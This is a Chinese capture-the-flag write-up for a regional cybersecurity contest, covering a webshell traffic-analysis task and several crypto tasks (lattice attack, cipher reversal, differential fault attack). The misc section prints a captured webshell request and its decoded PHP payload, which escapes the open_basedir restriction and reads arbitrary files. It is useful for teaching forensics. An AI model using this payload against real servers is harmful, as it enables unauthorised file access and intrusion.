第二届黄河流域网络安全技能挑战赛
misc
ez_wire
webshell的流量,追踪每一个http流量,先对其进行url解密,再base64解,
最后在一个流量中发现:
POST /shell.php HTTP/1.1
Host: 172.16.80.10:8080
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Content-Type: application/x-www-form-urlencoded
Content-Length: 1422
Connection: close
a=%40eval(%40base64_decode(%24_POST%5B'h50e3056ff32e1'%5D))%3B&h50e3056ff32e1=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjQ1YTliM2IwN2QiO0Bta2RpcigkdG1kaXIpO2lmKCFAZmlsZV9leGlzdHMoJHRtZGlyKSl7Y29udGludWU7fSR0bWRpcj1yZWFscGF0aCgkdG1kaXIpO0BjaGRpcigkdG1kaXIpO0Bpbmlfc2V0KCJvcGVuX2Jhc2VkaXIiLCAiLi4iKTskY250YXJyPUBwcmVnX3NwbGl0KCIvXFxcXHxcLy8iLCR0bWRpcik7Zm9yKCRpPTA7JGk8c2l6ZW9mKCRjbnRhcnIpOyRpKyspe0BjaGRpcigiLi4iKTt9O0Bpbmlfc2V0KCJvcGVuX2Jhc2VkaXIiLCIvIik7QHJtZGlyKCR0bWRpcik7YnJlYWs7fTt9OztmdW5jdGlvbiBhc2VuYygkb3V0KXtyZXR1cm4gQGJhc2U2NF9lbmNvZGUoJG91dCk7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzUiLiI5MmMiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjg4MTYiLiIzMjYzIjt9b2Jfc3RhcnQoKTt0cnl7JEY9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJ1ZjVmZDVkMjkxNTBmZCJdLDIpKTskUD1AZm9wZW4oJEYsInIiKTtlY2hvKEBmcmVhZCgkUCxmaWxlc2l6ZSgkRik%2FZmlsZXNpemUoJEYpOjQwOTYpKTtAZmNsb3NlKCRQKTs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D&uf5fd5d29150fd=uLL2ZsYWcudHh0HTTP/1.1 200 OK
Host: 172.16.80.10:8080
Date: Sat, 23 Sep 2023 02:13:06 GMT
Connection: close
X-Powered-By: PHP/8.2.7
Content-type: text/html; charset=UTF-8
3592cREFTQ1RGezhkOWNkNWU1LTFjYzctMGNhZi05MjRlLTk4NzMxZDNjMTAwZX0=88163263
解码后:
@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.45a9b3b07d";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "35"."92c";echo @asenc($output);echo "8816"."3263";}ob_start();try{$F=base64_decode(substr($_POST["uf5fd5d29150fd"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
DASCTF{8d9cd5e5-1cc7-0caf-924e-98731d3c100e}
响应的流量包中要根据前面请求的去掉一部分开头和结尾,才能正确解密
crypto
easyntru
源码
from secret import flag
import libnum
bits = 2048
while True:
q = random_prime(2^bits, lbound=2^(bits - 1))
f = random_prime(2^(3*bits//4 - 1))
g = random_prime(2^(bits//4 - 1))
if gcd(f, q*g) == 1:
h = f.inverse_mod(q) * g % q
break
r = random_prime(2^(3*bits//4 - 1))
m = libnum.s2n(flag)
assert m < 2^(bits//4)
c = (r * h + m) % q
print('q = %d' % q)
print('h = %d' % h)
print('c = %d' % c)
q = 24445829856673933058683889356407393860808522483552243481673407476395441107312130500945533047834993780864465577896968035259377721441466959027298166974554621753030728893320770628116412892838297326949997096948374940319126319050202262831370086992122741039059235809755486170276098658609363789670834482459758766315965501103856358827004129316458293962968758091319313119139703281758409686502729987426264868783862562150543872477975124482520151991822540312287812454562890993596447391870392038170902308036014733295394468384998808411243690466996284064331048659179342050962003962851315539367769981491650514319735943099663094899893
h = 4913183942329791657370364901346185016154546804260113829799181697126245901054001842015324265348151984020885129647620152505641164596983663274947698263948774663097557712000980632171097748594337673511102227336174939704483645747401790373320060474777199502879236509921155985395351647045776678540066383822814858118010995298071799515355111562392871675582742450331679030377003011729873888234401630551097244308473512890467393558048369156638425711104036276296581364374424105121033213701940135560177615395895359023414249846471332180098181632276243857635719541258706892559869642925945927703702696983949003370155033272664851406633
c = 23952867341969786229998420209594360249658731959635047659110331734424497403162506614140213749790708068086973241468969253395309243550869149482017583754015801740198734485871141965939993554966887039832701333623276590311516052334557237678750680087492306461195312290860900992532859827406262394480605001436094705579158919540851727801502678160085863180222123880690741582667929660533985778430252783414931317574267109741748071838599712027351385462245528001743693258053631099442571041984251010436099847588345982312217135023484895981833846397834589554744611429133085987275209019352039744743479972391909531680560125335638705509351
仔细审题其实发现这题跟前面那坨没关系,主要是这个式子c = (r * h + m) % q
造个格
\[(k,1,-r)\times\begin{pmatrix}2^{1023}*q & 0 & 0 \\2^{1023}*c & 2^{1535} & 0\\2^{1023}*h & 0 & 1\end{pmatrix}
\]
LLL规约得到r
q = 24445829856673933058683889356407393860808522483552243481673407476395441107312130500945533047834993780864465577896968035259377721441466959027298166974554621753030728893320770628116412892838297326949997096948374940319126319050202262831370086992122741039059235809755486170276098658609363789670834482459758766315965501103856358827004129316458293962968758091319313119139703281758409686502729987426264868783862562150543872477975124482520151991822540312287812454562890993596447391870392038170902308036014733295394468384998808411243690466996284064331048659179342050962003962851315539367769981491650514319735943099663094899893
h = 4913183942329791657370364901346185016154546804260113829799181697126245901054001842015324265348151984020885129647620152505641164596983663274947698263948774663097557712000980632171097748594337673511102227336174939704483645747401790373320060474777199502879236509921155985395351647045776678540066383822814858118010995298071799515355111562392871675582742450331679030377003011729873888234401630551097244308473512890467393558048369156638425711104036276296581364374424105121033213701940135560177615395895359023414249846471332180098181632276243857635719541258706892559869642925945927703702696983949003370155033272664851406633
c = 23952867341969786229998420209594360249658731959635047659110331734424497403162506614140213749790708068086973241468969253395309243550869149482017583754015801740198734485871141965939993554966887039832701333623276590311516052334557237678750680087492306461195312290860900992532859827406262394480605001436094705579158919540851727801502678160085863180222123880690741582667929660533985778430252783414931317574267109741748071838599712027351385462245528001743693258053631099442571041984251010436099847588345982312217135023484895981833846397834589554744611429133085987275209019352039744743479972391909531680560125335638705509351
T=2^1023
A=matrix(ZZ,[[T*q,0,0],[T*c,2^1535,0],[T*h,0,1]])
r=abs(A.LLL()[1][2])
m = (c-r*h) % q
long_to_bytes(m)
#b'flag{7c95453a-e577-40d8-9ad0-993655b83b69}'
easy_encrypt
仔细分析后,发现encrypt_1函数能还原c1的前半部分,而后半部分将encrypt_1改改就行:
def f(word, key):
out = ""
for i in range(len(word)):
out += chr(ord(word[i]) ^^ key)
return out
m, n = 17, 18
num = [0]*18
def encrypt_1(key):
L, R = key[0:len(key)//2], key[len(key)//2:]
x=''
for i in range(len(L)):
x += chr(ord(f(R, m)[i]) ^^ ord(L[i]))
y = f(R, 2)
L, R = y, x
x=''
for i in range(len(L)):
x += "".join(chr(ord(f(R, n)[i]) ^^ ord(L[i])) )
y = f(R, 2)
cipher = x + y
return(cipher)
def decrypt_1(key):
x,y = key[0:len(key)//2],key[len(key)//2:]
R = f(y,2)
L = ''
for i in range(len(x)):
L += "".join(chr(ord(f(R, n)[i]) ^^ ord(x[i])) )
return f(L,2)
with open('cipher.txt', 'r') as file:
c1 = file.readlines()
c1 = c1[:-1]
flag1 = encrypt_1(c1)[:len(c1)//2]+decrypt_1(c1)
#'flag{W0w_y0U_FiND_'
第二部分,就简单异或,逆向一下即可:
def decrypt_2(num):
l=len(num)
k = 0
key = [0]*l
for i in range(l):
key[i] = (num[i] ^^ (k % 3 + 1)) - i
key[l-i-1] = (num[l-i-1] ^^ (k % 3 +1)) + i + 1 - l
k+=1
flag2 = ''
for i in range(len(key)):
flag2+=chr(key[i])
return flag2
c2= [119, 107, 102, 97, 58, 114, 122, 124, 108, 122, 72, 45, 49, 48, 44, 49, 51, 141]
flag2=decrypt_2(c2)
flag = flag1 + flag2
#'flag{W0w_y0U_FiND_the_4nswer@#$%!!!}'
baby_dfa
参考大佬博客Crypto趣题-分组密码 | 糖醋小鸡块的blog (tangcuxiaojikuai.xyz)
将大佬的脚本拿来稍微改改
from Crypto.Util.number import *
from pwn import *
from binascii import *
from z3 import *
def rotl(x, n): return ((x << n) & 0xffffffff) | ((x >> (32 - n)) & 0xffffffff)
def xorl(x, y): return list(map(lambda a, b: a ^ b, x, y))
def List2Int(x): return x[0] << 24 | x[1] << 16 | x[2] << 8 | x[3]
def Int2List(x): return [x >> 24, (x >> 16) & 0xff, (x >> 8) & 0xff, x & 0xff]
def l(B):
B = List2Int(B)
B = B ^ rotl(B, 2) ^ rotl(B, 10) ^ rotl(B, 18) ^ rotl(B, 24)
return Int2List(B)
def decrypt(K,cipher,inv_S):
T = List2Int(xorl(K[4:],cipher))
s = Solver()
B = BitVec('B',32)
s.add(B ^ rotl(B, 2) ^ rotl(B, 10) ^ rotl(B, 18) ^ rotl(B, 24) == T)
if s.check() == sat: #检测是否有解
result = str(s.model())
T = Int2List(int(result[5:-1]))
for i in range(len(T)):
T[i] = inv_S[T[i]]
T = List2Int(xorl(K[:4],T))
return long_to_bytes(T).hex()
def getflag():
while(1):
try:
r = remote("60.204.206.104",7000)
r.recvuntil(b"sbox: ")
S = eval(r.recvline())
inv_S = [0 for i in range(256)]
for i in range(256):
inv_S[S[i]] = i
x = []
#0
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(b"\x00"*4))
x.append(unhexlify(r.recvline().strip()))
print(x)
#1
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(b"\x00"*3 + b"\x01"*1 +b"\x00"*0))
x.append(unhexlify(r.recvline().strip()))
print(x)
#2
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(b"\x00"*2 + b"\x01"*1 +b"\x00"*1))
x.append(unhexlify(r.recvline().strip()))
print(x)
#3
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(b"\x00"*1 + b"\x01"*1 +b"\x00"*2))
x.append(unhexlify(r.recvline().strip()))
print(x)
#4
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(b"\x00"*0 + b"\x01"*1 +b"\x00"*3))
x.append(unhexlify(r.recvline().strip()))
print(x)
#获取key
key_prefix = []
#1.获取key[:4]
for i in range(1,5):
if(i % 2 == 0):
temp = (xorl(x[0],x[i]))[i-2]
elif(i % 2 == 1):
temp = (xorl(x[0],x[i]))[i]
for j in range(255):
t1 = (S[j]>>6) + ((S[j]&0b111111)<<2)
t2 = (S[j^1]>>6) + ((S[j^1]&0b111111)<<2)
if(t1^t2 == temp):
key_prefix.append(inv_S[S[j]])
break
key_prefix = key_prefix[::-1]
print(key_prefix)
#2.获取key[4:]
temp = r.recvuntil(b"> ")
r.sendline(b"1")
temp = r.recvuntil(b"plz enter your plaintext: ")
r.sendline(hexlify(long_to_bytes(List2Int(key_prefix))))
key_suffix = Int2List(bytes_to_long(unhexlify(r.recvline().strip())))
T = [0,0,0,0]
temp = l([S[i] for i in T])
key_suffix = xorl(temp, key_suffix)
key_final = long_to_bytes(List2Int(key_prefix)) + long_to_bytes(List2Int(key_suffix))
print(key_final)
#获取flag
temp = r.recvuntil(b"> ")
r.sendline(b"2")
temp = r.recvuntil(b"cipher is ")
cipher = unhexlify(r.recvline().strip())
t = decrypt(key_final,cipher,inv_S)
r.sendline(t)
temp = r.recvline()
print(temp)
if(b"fake!" not in temp):
return
r.close()
except:
pass
getflag()
#b"plz enter your plaintext: b'flag{21a7369e-b123-05cb-e80a-982a4f85308a}'\n"
浙公网安备 33010602011771号